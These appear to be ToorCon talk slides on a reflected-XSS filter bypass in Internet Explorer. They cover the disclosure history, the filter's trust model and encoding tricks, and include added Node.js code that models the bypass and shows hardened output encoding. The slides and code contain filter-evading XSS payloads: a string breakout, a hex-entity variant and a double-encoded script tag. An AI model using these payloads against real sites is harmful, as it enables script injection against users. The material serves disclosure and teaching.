Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea





Agenda:
- Bypass: History
- Explanation: What Is Going On
- Process: Things To Look For
- Demos: alert(1) Done Live (hopefully)
- CSP: Content Security Policy
- End Notes: (Bonus Bypass?)

Bypass: History
- Late Friday, August 23rd, 2013: finishing a webapp assessment
- Visiting the site in different browsers, looking for browser-specific functionality

- Previously found a reflected XSS vulnerability
- The page reflects the injection into a JavaScript block further up the page
- The page checks whether it is rendered inside an iframe from a specific parent page (self != parent)
- Not framed? It redirects to the page that contains the iframe, and the injection is lost

- On that framing page, the iframe src is built from a URL/URI query-string parameter
- An injection in that parameter value lands inside the iframe definition
- The iframe then loads the vulnerable page with the injection, and the XSS executes on the vulnerable page

- Vulnerability initially found with Firefox
- Looked for browser-specific functionality; tested Internet Explorer last
- Decided to poke at the XSS vulnerability in Internet Explorer

- Standard XSS training: hex entities are decoded in attribute space (the value part of a param="value" pair inside an HTML tag)
- Try an injection that doesn't look like <script>alert(1)</script>
- Encode a few characters, then enter the injection in Internet Explorer

- Weekend: built deliberately vulnerable PHP code to recreate the bypass
- Reported to Microsoft: August 26th, 2013, Case #15412
- Response from Microsoft: October 4th, 2013

Explanation: What Is Going On
- Internet Explorer's XSS filter has a trust model that determines which requests are subject to the filter
- Some requests are not trusted: subject to the filter
- Some requests are trusted: not subject to the filter
- Abuse that trust: bypass the filter

- The Primary Request carrying the injection is made
- The Primary Request does not cause IMMEDIATE JavaScript execution
- The Primary Request is subject to the filter
- A Secondary Request to the same domain is induced, carrying data from the Primary Request
- The Secondary Request does cause JavaScript execution
- The Secondary Request is trusted and not subject to the filter

Process: Things To Look For
- Functionality on the site that will induce a secondary request onto the same domain:
  - iframes, frames
  - form submissions
  - href attributes
  - JavaScript redirects
  - places where both <a> and </a> can be injected

- Hiding data in the Primary Request
- Landing in attribute space?
  - Hexadecimal character reference: &#xyy; (HTML 4.0, 1998)
  - Decimal character reference: &#ZZ; (HTML 2.0, 1995)
  - Named entity: &ww; (HTML 2.0, 1995)
  - URL/URI percent-encoding: %VV (RFC 1630, 1994)
- Landing in JavaScript space?
  - URL/URI percent-encoding: %VV (RFC 1630, 1994)

- Things the filter doesn't like: periods, <form>, <frame>, <iframe>
- Things the filter sometimes permits and sometimes doesn't: ( ) [ ] { } (parentheses, square brackets, curly brackets), and the word "style"
- Can use class instead of style (see demos)
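The trust model and the attribute-space encoding above, as an added Node.js example that is not code from the talk or from its GitHub repository. It models a hypothetical two-page app (outer.php reflecting a parameter into an iframe src, inner.php reflecting it into a JavaScript string), a stand-in request filter and a browser that decodes the attribute before issuing the induced request; the page names, the parameter q, the filter heuristics and the payload are all assumptions, and the filter is not Internet Explorer's real one.

```javascript
// Added example, not code from the talk or its repository: a Node.js model of
// the primary/secondary request pattern. outer.php, inner.php, the parameter
// q, the stand-in filter and the payload are illustrative assumptions.

const NAMED = { lt: '<', gt: '>', quot: '"', amp: '&', apos: "'" };

// Decode HTML character references in attribute space the way a browser does
// before it uses the value: &#xHH; (hex, HTML 4.0), &#DD; (decimal, HTML 2.0)
// and a few named entities (HTML 2.0). Unknown references are left untouched.
function decodeHtmlAttr(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (match, ref) => {
    if (/^#x/i.test(ref)) return String.fromCodePoint(parseInt(ref.slice(2), 16));
    if (ref[0] === '#') return String.fromCodePoint(parseInt(ref.slice(1), 10));
    const name = ref.toLowerCase();
    return Object.prototype.hasOwnProperty.call(NAMED, name) ? NAMED[name] : match;
  });
}

// Stand-in for a reflective XSS filter that inspects only the request it is
// about to render: after ONE URL-decode it looks for a raw tag, an inline
// handler, or a quote that closes a JS string and calls a function. These
// heuristics are illustrative; IE's real rules are not on the page.
function filterBlocks(url) {
  const query = decodeURIComponent(url.split('?')[1] || '');
  return /<(script|iframe|frame|form)\b|\bon\w+\s*=|['"]\s*;\s*\w+\s*\(/i.test(query);
}

// Hypothetical vulnerable app: outer.php reflects ?q= into an iframe src
// attribute (attribute space); inner.php reflects ?q= into a JavaScript
// string literal (JavaScript space). Neither page encodes its output.
function renderOuter(q) {
  return `<html><body><iframe src="/inner.php?q=${q}"></iframe></body></html>`;
}
function renderInner(q) {
  return `<html><script>var q = '${q}';</script></html>`;
}

// Browser model. The navigation (Primary Request) is subject to the filter.
// The iframe load it induces is a same-origin Secondary Request; following
// the trust model described above, it is not inspected.
function browse(primaryUrl) {
  if (filterBlocks(primaryUrl)) return { blocked: true };
  const [path, query = ''] = primaryUrl.split('?');
  const q = decodeURIComponent(query.replace(/^q=/, ''));
  if (path === '/inner.php') return { blocked: false, innerHtml: renderInner(q) };
  const outerHtml = renderOuter(q);
  // The browser decodes the attribute value, then requests that URL.
  const secondaryUrl = decodeHtmlAttr(/src="([^"]*)"/.exec(outerHtml)[1]);
  const innerQ = decodeURIComponent(secondaryUrl.split('?q=')[1] || '');
  return { blocked: false, secondaryUrl, innerHtml: renderInner(innerQ) };
}

// Constructed payload that breaks out of the string literal in inner.php.
const RAW = "';alert(1);//";
// Same payload with the quote and semicolons as hex character references.
// On the Primary Request the filter sees no quote and no ";alert(" pattern;
// the browser restores them when it reads the iframe src attribute.
const HEX = '&#x27;&#x3B;alert(1)&#x3B;//';

function directAttempt() {   // straight at inner.php: caught by the filter
  return browse('/inner.php?q=' + encodeURIComponent(RAW));
}
function bypassAttempt() {   // via outer.php: reaches inner.php unfiltered
  return browse('/outer.php?q=' + encodeURIComponent(HEX));
}
```

Run it with node and compare directAttempt() (blocked) with bypassAttempt(): the secondary URL it produces is exactly the one the filter would have blocked had it been inspected, yet inner.php renders it. The lesson for the application side is unchanged by any filter: inner.php must encode for the JavaScript string context and outer.php for the attribute context, because the filter only ever sees one hop.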

CSP: Content Security Policy
- "A policy language used to declare a set of content restrictions for a web resource, and a mechanism for transmitting the policy from a server to a client where the policy is enforced." Content Security Policy 1.0, http://www.w3.org/tr/csp/
- Maybe no more XSS (if done correctly)???
- What about Internet Explorer?

- Only Internet Explorer 10 and 11 have any support for Content Security Policy
- That support is limited, and it uses the older X-Content-Security-Policy header instead of the official Content-Security-Policy header
- Source: http://content-security-policy.com
- Does Content Security Policy currently help against this bypass? No

End Notes
- Microsoft's "No Fix" response, with two different reasons given:
- First reason (given in October 2013): "requires special functionality". Not actually true: everything used in the bypass has been part of the official HTML spec since at least 1998
- Second reason (given later, in December 2013): "requires user interaction". Partially true, but not fully true

Bonus Bypass:
- If the webapp performs double URL/URI decoding, Internet Explorer's XSS filter doesn't catch it
- Demo (if time permits)
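The bonus bypass, as an added Node.js example that is not code from the talk or its repository. It contrasts a filter that URL-decodes the request once with a hypothetical handler that decodes the same parameter twice, and shows the hardened form next to it; page.php, the parameter q and the filter heuristic are assumptions.

```javascript
// Added example, not code from the talk or its repository: a Node.js model of
// the bonus bypass. page.php, the parameter q, the one-pass filter and the
// two handlers are illustrative assumptions.

// One-pass inspection, as a request-level filter does: URL-decode the query
// string once and look for a tag or an inline event handler.
function filterSeesTag(url) {
  const query = decodeURIComponent(url.split('?')[1] || '');
  return /<\w+|\bon\w+\s*=/i.test(query);
}

function rawParam(url) {
  return url.split('?q=')[1] || '';
}

// Vulnerable handler: the web server/framework already URL-decoded the query
// string once; the application then calls urldecode() on the value again
// before reflecting it, so a second layer of %-encoding is peeled off that
// the filter never saw.
function vulnerableRender(url) {
  const once = decodeURIComponent(rawParam(url));   // framework decode
  const twice = decodeURIComponent(once);           // application's extra urldecode()
  return `<script>var q = '${twice}';</script>`;    // raw reflection
}

// Hardened handler: decode exactly once and encode for the JavaScript string
// context on output, so whatever survives decoding cannot leave the literal.
function hardenedRender(url) {
  const once = decodeURIComponent(rawParam(url));
  const literal = JSON.stringify(once)
    .replace(/</g, '\\u003c')   // keeps "</script>" from closing the block
    .replace(/\u2028|\u2029/g, c => '\\u' + c.charCodeAt(0).toString(16));
  return `<script>var q = ${literal};</script>`;
}

// Constructed double-encoded payload: %253C decodes to %3C, which decodes to "<".
const DOUBLE = '%253Cscript%253Ealert(1)%253C%252Fscript%253E';
```

With DOUBLE in the query, filterSeesTag() sees only %3Cscript%3E and passes the request, while vulnerableRender() reflects a live script tag. The hardened handler never needs to guess how many times the input was encoded: it decodes once and makes the output context safe regardless of what the value contains.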

The Playground:
- Deliberately vulnerable pages
- Can be used for training on the bypass

Links:
- http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx
- http://threatpost.com/bypass-of-internet-explorer-crosssite-scripting-filter-possible/103106
- http://gazebelwerks.net/internetexplorer/
- https://github.com/rtwaysea/ie-xss-filter-bypass-2.0

Any Questions?
- http://gazebelwerks.net/internetexplorer/
- https://github.com/rtwaysea/ie-xss-filter-bypass-3.0
- @RTWaysea
- carlos.munoz@whitehatsec.com
Thank You ToorCon!